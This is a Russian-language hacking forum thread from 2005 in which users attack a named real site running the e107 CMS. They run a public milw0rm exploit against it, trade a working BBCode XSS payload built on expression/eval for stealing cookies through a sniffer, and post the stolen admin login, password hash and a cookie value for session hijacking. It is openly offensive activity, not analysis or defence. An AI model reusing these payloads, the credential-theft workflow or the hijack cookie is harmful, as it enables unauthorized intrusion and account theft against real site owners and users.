Форумы движок от http://www.e107.ru/

Discussion in 'Уязвимости CMS/форумов' started by Tikson, 9 Oct 2005.

  1. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    Хотелеось бы ипытать его на прочность
    я конечно приметил уже пару сайтов(2 как минимум) на которых стоит этот движок и я так же хочу скаать вам что он очень популярен...
    первое что я конечно сделел это испытание на скьюл иньекцию... не пошло пишет акцес дениед, но зато можно просматривать почти все директории :
    e107_admin,e107_docs,e107_files,e107_handlers,e107_images,e107_languages,e107_plugins,e107_themes
    но в них я не нашол чего-нибуть интересного.Нельзя просматривать содержимое www.sait.net/e107_config
    так как есть фаил e107.htaccess который препядствует просмотру . Но все же если обратиться к сайту так www.sait.net/e107_plugins/autogallery/autogallery.php?show=любой_текс то этот "любой_текст" будет напечатан но это не дает ничего больше тоесть скрипт только печатает и ничего более...
    и еще очень странно на мой взгляд предается значение id оно пере дается чере точку например id.1
     
  2. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    #2 Rebz, 9 Oct 2005
    Last edited by a moderator: 4 Dec 2005
  3. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    Rebz спасибо =)))
    ps я думал уж что мне не помогут, спасибо, большой респект тебе и всему античату =)
    СПАСИБО!!!
     
  4. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    Rebz я использовал сплоит => http://milw0rm.com/id.php?id=704
    есть вопрос что значит "b4d upload!!"
    я все делал как в сплоите написано
    perl 1\e107.pl www.nradio.ru
    1 - это папка в которой у меня лежит сплоит
    и вмне значит выводится сообщение
    ## www.nradio.ru
    ## b4d upload!!

    что это начит??? и как от этого танцевать????
     
  5. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    гык, если честно, то не знаю..) надо исходный код смотреть.. возможно там стоит небольшая защита.. а возможно версия e107 пропатчена..
     
  6. Kond4r

    Kond4r Elder - Старейшина

    Joined:
    27 Sep 2005
    Messages:
    100
    Likes Received:
    1
    Reputations:
    0
  7. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    это в картинке можно писать??? там вообщето нельзя фаилы закачивать
     
  8. Kond4r

    Kond4r Elder - Старейшина

    Joined:
    27 Sep 2005
    Messages:
    100
    Likes Received:
    1
    Reputations:
    0
  9. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    Да... возможно, они на папочку upload поставили права не 777. -)
    В общем, как вариант, можете на др.сайте попробовать.. если будет такая же ошибка выскакивать, значит дело в сплоите).
     
  10. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    Kond4r как ты зделал это?????? как залил и что????
     
  11. Kond4r

    Kond4r Elder - Старейшина

    Joined:
    27 Sep 2005
    Messages:
    100
    Likes Received:
    1
    Reputations:
    0
    да нихрена я не сделал...(((
    файл images.php у них там поумолчанию уже находился, как я понял ксплойд использует уязвимость в этом файле для того чтобы закачать на сервер свой... Но как сказал Rebz они наверно там права на запись отрубили... поэтому не удлить не закачать скрипт не получится... Хотя можно попробовать в другую директорию им кинуть, вообщем поэксперементировать.
    А вообще попробуй лучше XSS времени меньше потратишь: захреначил его и пошёл пивко пить, пишёл хеши собрал пароли нашёл и всё...
    ЗЫ: Это конечно в идеале, а на самом деле хз как получится...
     
  12. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    тоест ты предлагаешь вот это
    ##############################
    www.ut[url=http://www.s=''style='fo...ent.cookie;this.sss=null`style='font-size:0;][/url]'
    ##############################
    тока ничего не получается
    я когда это в подпись вставил то ничего небыло видно однако почумуто была ковычка видимо что то не так ???
    ps может их умоломать поставить права 777 мол так сайт лючше работать будет хотя непохоже что админ лопух он одминит по крайне мене еще 5 сайтов в том числе и сайт http://www.e107.ru/
     
  13. Kond4r

    Kond4r Elder - Старейшина

    Joined:
    27 Sep 2005
    Messages:
    100
    Likes Received:
    1
    Reputations:
    0
    [cоlor=#EFEFEF][иrl]www.ut[иrl=http://www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=alert();this.sss=null`style='font-size:0;][/иrl][/url]'[/cоlor]

    У меня всё работает.... Действуй! токо перепиши, я там "о" русскую поставил и "и" заместо "u"
     
  14. Kond4r

    Kond4r Elder - Старейшина

    Joined:
    27 Sep 2005
    Messages:
    100
    Likes Received:
    1
    Reputations:
    0
    Мда... какой-то сраненький форум....
    Я тут 5 дней уже Ipb ломаю там ася у чела как у меня мобильный - ну очень хочется...
    А тут за 2 часа всё ясно и понятно
     
  15. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    Kond4r так надо еще поломать а потом уже ... =)
    а насчет си давай это хорошее дело =)
     
  16. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
  17. Kond4r

    Kond4r Elder - Старейшина

    Joined:
    27 Sep 2005
    Messages:
    100
    Likes Received:
    1
    Reputations:
    0
    login: neo
    id: 1
    hash:55994831ef1efc93f541e94bf84fd1cd

    ТОКО ТАМ $HASH=MD5(MD5($PASS))
     
    #17 Kond4r, 10 Oct 2005
    Last edited: 10 Oct 2005
  18. Kond4r

    Kond4r Elder - Старейшина

    Joined:
    27 Sep 2005
    Messages:
    100
    Likes Received:
    1
    Reputations:
    0
    Либо: в куках пропиши:

    rcookie=1.55994831ef1efc93f541e94bf84fd1cd
     
  19. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    Kond4r Молоца !!!
    Как хеши раздобыл, с помошью xss ? Исходник который ты использовал можешь привести(полный)?
    ps этот "neo" радиcт-шифровщик какой-то, его MD5 хеш бруту не поддается, буду в куки пихать...
     
  20. Kond4r

    Kond4r Elder - Старейшина

    Joined:
    27 Sep 2005
    Messages:
    100
    Likes Received:
    1
    Reputations:
    0
    это двойной хэш... так просто его не подберёшь...
    Да ХSS. А исходник тот который Rebz дал, я там токо адрес снифера сменил на свой...